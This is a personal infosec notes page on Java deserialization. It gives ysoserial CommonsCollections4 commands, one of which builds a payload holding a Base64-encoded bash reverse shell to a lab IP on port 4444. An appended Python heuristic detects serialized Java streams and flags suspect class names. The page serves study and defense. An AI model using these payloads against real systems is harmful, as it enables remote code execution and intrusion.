akde/infosec

Information security is ultimately about managing risk


If you can provide a serialized (.ser) file, try to create a payload directly if you have the source code, or just use a ysoserial payload.

java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 4 192.168.49.175" > /tmp/recycler.ser
# Prepare a reverse shell command line and transform it into Base64.
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE3NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" > /tmp/recycler.ser

Notes

  • Deserialization attack tool
  • https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
  • See also https://book.hacktricks.xyz/pentesting-web/deserialization#java-http
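
For the defensive side of the commands above, this added example (not from the original page or the ysoserial project) checks whether bytes from an upload, cookie or request body are a Java serialization stream and lists the class names they declare, flagging a reviewer-chosen package prefix. The function names, `FLAGGED_PREFIXES` and the sample bytes are assumptions constructed for illustration; the scan is a heuristic, not a full stream parser.

```python
import base64
import binascii
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"  # stream magic 0xACED + stream version 5
TC_CLASSDESC = b"\x72"              # tag that opens a class descriptor
# Assumption: prefixes a reviewer flags (this page's payload type is named after Commons Collections 4).
FLAGGED_PREFIXES = ("org.apache.commons.collections4.",)
_NAME = re.compile(rb"[A-Za-z_$\[][\w$.;\[]*")

def to_raw(data):
    """Return raw stream bytes, decoding the Base64 form ("rO0AB...") if present."""
    text = data.strip()
    if text.startswith(b"rO0AB"):
        try:
            return base64.b64decode(text)
        except binascii.Error:
            pass
    return data

def class_names(raw):
    """Heuristic: list names found in TC_CLASSDESC records (tag, u16 length, name)."""
    names, i = [], raw.find(TC_CLASSDESC)
    while i != -1:
        if i + 3 <= len(raw):
            (n,) = struct.unpack(">H", raw[i + 1:i + 3])
            name = raw[i + 3:i + 3 + n]
            # A real descriptor continues with an 8-byte serialVersionUID and a flags byte.
            if n and i + 3 + n + 9 <= len(raw) and _NAME.fullmatch(name):
                names.append(name.decode("ascii"))
        i = raw.find(TC_CLASSDESC, i + 1)
    return names

def inspect(data):
    """Classify bytes taken from an upload, cookie or request body."""
    raw = to_raw(data)
    if not raw.startswith(STREAM_MAGIC):
        return {"java_serialized": False, "classes": [], "flagged": []}
    classes = class_names(raw[len(STREAM_MAGIC):])
    flagged = [c for c in classes if c.startswith(FLAGGED_PREFIXES)]
    return {"java_serialized": True, "classes": classes, "flagged": flagged}

# Constructed sample: class descriptors only (dummy serialVersionUID, no fields), not a usable object.
def _desc(name):
    b = name.encode()
    return TC_CLASSDESC + struct.pack(">H", len(b)) + b + b"\x00" * 8 + b"\x02\x00\x00\x78\x70"
SAMPLE = (STREAM_MAGIC + b"\x73" + _desc("java.util.PriorityQueue") + b"\x73"
          + _desc("org.apache.commons.collections4.comparators.TransformingComparator"))
```

A hit on the magic bytes alone is worth logging at any endpoint that is not supposed to accept Java objects; the class list helps triage what the stream would try to instantiate.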

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
